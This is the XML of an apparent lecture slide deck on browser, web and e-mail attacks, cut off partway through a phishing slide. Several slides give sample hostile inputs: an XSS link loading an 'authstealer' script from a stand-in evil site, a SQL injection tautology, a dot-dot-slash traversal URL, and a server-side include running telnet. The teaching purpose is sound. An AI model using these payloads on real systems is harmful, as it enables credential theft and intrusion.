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6" r:id="rId2"/>
    <p:sldId id="327" r:id="rId3"/>
    <p:sldId id="328" r:id="rId4"/>
    <p:sldId id="745" r:id="rId5"/>
    <p:sldId id="400" r:id="rId6"/>
    <p:sldId id="732" r:id="rId7"/>
    <p:sldId id="697" r:id="rId8"/>
    <p:sldId id="698" r:id="rId9"/>
    <p:sldId id="699" r:id="rId10"/>
    <p:sldId id="700" r:id="rId11"/>
    <p:sldId id="744" r:id="rId12"/>
    <p:sldId id="702" r:id="rId13"/>
    <p:sldId id="703" r:id="rId14"/>
    <p:sldId id="705" r:id="rId15"/>
    <p:sldId id="704" r:id="rId16"/>
    <p:sldId id="706" r:id="rId17"/>
    <p:sldId id="707" r:id="rId18"/>
    <p:sldId id="708" r:id="rId19"/>
    <p:sldId id="710" r:id="rId20"/>
    <p:sldId id="711" r:id="rId21"/>
    <p:sldId id="713" r:id="rId22"/>
    <p:sldId id="722" r:id="rId23"/>
    <p:sldId id="721" r:id="rId24"/>
    <p:sldId id="723" r:id="rId25"/>
    <p:sldId id="724" r:id="rId26"/>
    <p:sldId id="725" r:id="rId27"/>
    <p:sldId id="727" r:id="rId28"/>
    <p:sldId id="728" r:id="rId29"/>
    <p:sldId id="729" r:id="rId30"/>
    <p:sldId id="776" r:id="rId31"/>
    <p:sldId id="746" r:id="rId32"/>
    <p:sldId id="777" r:id="rId33"/>
    <p:sldId id="778" r:id="rId34"/>
    <p:sldId id="779" r:id="rId35"/>
    <p:sldId id="780" r:id="rId36"/>
    <p:sldId id="781" r:id="rId37"/>
    <p:sldId id="747" r:id="rId38"/>
    <p:sldId id="558" r:id="rId39"/>
    <p:sldId id="559" r:id="rId40"/>
    <p:sldId id="560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22" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="108" d="100"/>
          <a:sy n="108" d="100"/>
        </p:scale>
        <p:origin x="126" y="4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>- Monday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Man-in-the-Browser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browser controls all the interactions with the world wide web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If your browser has been compromised, it doesn't matter how good your encryption is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The browser sees all the data before it is encrypted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SilentBanker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> was an example of a plug-in that stole bank information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The banking websites still worked!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="231540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eyGrabber USB Hardware Keylogger 4 M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4953000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Keystroke logging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It's possible to install software that logs all the keystrokes a user enters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If designed correctly, these values come from the keyboard drivers, so all data (including passwords) is visible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser interaction is a great target for keystroke logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are also hardware keystroke loggers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many are $40 or less</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is your keyboard free from a logger?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="421137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Page-in-the-middle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page-in-the-middle attack is one in which you are redirected to a page that looks like the one you wanted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, a copy of your banking website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Such a page might be arrived at because  of a phishing link or DNS cache poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A browser-in-the-middle attack is worse, since your browser is compromised and no websites can be trusted</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102021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download substitution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page could trick you into downloading a file that appears to be an application you want</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In reality, it's a virus, Trojan horse, or other  malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How do you know what you're downloading?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often, there's no way to be sure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="362341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CAPTCHAs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You're all familiar with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>CAPTCHAs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name is an acronym for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Completely Automated Public Turing test to tell Computers and Humans Apart</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They are used primarily to stop bots from doing things like signing up for free e-mail accounts to use for spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2" descr="fb-captcha (1)">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19B5D572-9802-4039-9BDD-E2EEE7D76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5" y="2286000"/>
            <a:ext cx="421005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38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User-in-the-middle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user-in-the-middle attack tricks an unsuspecting user to do something only a human can do, like solve a CAPTCHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam and porn companies often have the same owners</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>People get offers for free porn in their e-mail, provided that they fill out a CAPTCHA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack is not very damaging to the individual, but it wastes time and fills the world with more spam</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102638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Browser authentication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6705600" cy="4931664"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We've already talked about how people authenticate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One of the problems here is that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>computers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are failing to authenticate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You're not sure that the site you're connecting to is really your bank</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The problem is hard because computers authenticate based almost entirely on what they know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It's possible to eavesdrop on such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62800" y="1773936"/>
            <a:ext cx="3276600" cy="1502664"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some banks let you to pick a picture and a caption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="https://upload.wikimedia.org/wikipedia/commons/b/b2/Hausziege_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3276600"/>
            <a:ext cx="24765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67600" y="5867061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GOAT POLITICS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46446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Web authentication can be done with approaches beyond or in addition to a password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shared secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secret questions asked earlier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One-time password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password provided by a SecurID or phone app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Out-of-band communication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sending a PIN and a credit card in separate mailings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Texting a one-time password to a registered cell phone</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204236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Attacks Targeting Users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0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Defaced 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Website defacement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is when an attacker changes the content of a legitimate website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually, this is done by exploiting a weakness in authentication of the people who are allowed to update content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attacks can be pranks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can be done to demonstrate that security is poor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often to embarrass government websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They can be done to show political disagreement with the website or the agency behind the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The changes could be subtle enough that the change is not noticed for a while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0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Countermeasures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secure design principles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Least privilege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Fail-safe defaults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Economy of mechanism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Complete mediation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Open design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Separation of privilege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Least common mechanism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Psychological acceptability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Fake website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Websites are easy to fake</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By their nature, the HTML, JavaScript, CSS, and images used to create a website are all publically available</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It's even possible to link to current images on the real website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This attack is usually designed to trick users into entering private information into the malicious website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303082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Protecting websites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Detecting that a change has occurred on a website can be difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One approach is to make a hash value of the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Store the hash elsewhere, securely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hash the contents of the website periodically to see if it still matches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This approach only works if the data doesn't constantly change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Digital signatures </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>allows companies to sign code to verify that they did originate the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: ActiveX controls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You shouldn't be running this kind of code anyway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32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Substitute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of website defacement is usually to embarrass the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It's meant to be noticed!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Substitute content is when malicious content (infected downloads, links to other malicious sites) are put on legitimate websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just because your link is to the right website doesn't mean that it hasn't been compromised</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407018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Only a website you visit can leave a cookie or run JavaScript, right?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sure, but how many sites do you visit?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Images that are linked to other websites (especially ads) count as visiting other websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Visiting a single page could store cookies from every ad on the page (and more!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Web bugs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> are images that are usually 1 x 1 pixels and clear</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They make it impossible to know how many sites could be storing cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323304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Clickjacking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Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is when you think you're clicking on one button, but you're really clicking on another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It could be that you're agreeing to download or install a program that you don't think you are</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Called a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>drive-by download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It could be that you think you're entering data into a real website, but it's just a front for a malicious one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These attacks are possible because web pages can have transparent frames, allowing you to see something that you're not really interacting with</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349305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user or website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inherently unsecure model used for web interactions has a number of weak points</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some ways that website data can be leaked include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dot-dot-slash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server-side includes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359827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scripting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Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (XSS) is when executable code is added to what should be purely a transmission of data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often, this is done by adding JavaScript to a URL so that a script is executed when clicking on a link</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example from Wikipedia:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://bobssite.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>?q=puppies&lt;script%20src="http://mallorysevilsite.com/authstealer.js"&gt;&lt;/script&gt;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8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the example with Bobby Tables, an SQL injection attack is one in which SQL code, often embedded in a URL, is manipulated to perform additional functions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Original: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"SELECT * FROM transactions WHERE account='2468'"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modified: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"SELECT * FROM transactions WHERE account='2468' OR '1' = '1'"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00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Dot-dot-slash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you know, ../ refers to the directory above the current one</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On some systems, requesting a file several directories up could allow access to privileged information</a:t>
            </a:r>
          </a:p>
          <a:p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http://www.things.com/../../../secret.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54404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Server-side include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server-side include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is data in the webpage that the server interprets as a command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&lt;!--#exec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/bin/telnet &amp;"--&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The web content must somehow be manipulated to make the server generate the given HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Likewise, some knowledge of how a server interprets content and what commands are available is needed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20782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E-mail Attacks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878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Fake e-mail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There's lots of fake e-mail out there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The book calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>spam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> fake or misleading e-mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam overall is decreasing, but some kinds have become more popular</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake "Your message could not be delivered" messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fake social networking messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Current events messages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Shipping notices</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400331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Volume of spam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Kaspersky labs estimates that spam dropped from 80.3% of all e-mail in 2011 to 45.6% of all e-mail in 2023</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kaspersky labs estimates spam origin countries in 2024:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Russia: 36.2%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>China: 17.1%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>United States 8.4%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kazakhstan: 3.8%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spam is hard to pin down, so different labs have different estimates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="323490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people send spam?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Advertising black- or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>graymarket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pharmaceuticals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pump and dump – artificially inflating the price of a stock</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>General advertising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Malware in the e-mail or in links from the e-mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advertising sites (such as porn) that might be illegal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cost is virtually nothing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6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spam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Legal approaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>US CAN-SPAM act</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directive 2002/58/EC in Europe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It's hard to define what is and isn't spam</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most laws require an opt-out mechanism, but enforcement is hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IP addresses are easy to spoof, but the next generation Internet might change that</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Screening programs try to filter out spam (with both false positives and false negatives)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some web hosting companies enforce volume limitations on how many e-mails can be sent per day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Paying postage per e-mail?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96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E-mail spoofing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SMTP is the protocol for sending e-mail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It's very straight-forward</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field is easy to spoof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are protocols with authentication built in, but regular SMTP is entrenched how</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can never trust header information in an e-mail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3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Phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is when an e-mail tries to trick someone into giving out private data or doing something else unsafe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Spear phishing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is phishing that targets a specific individual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
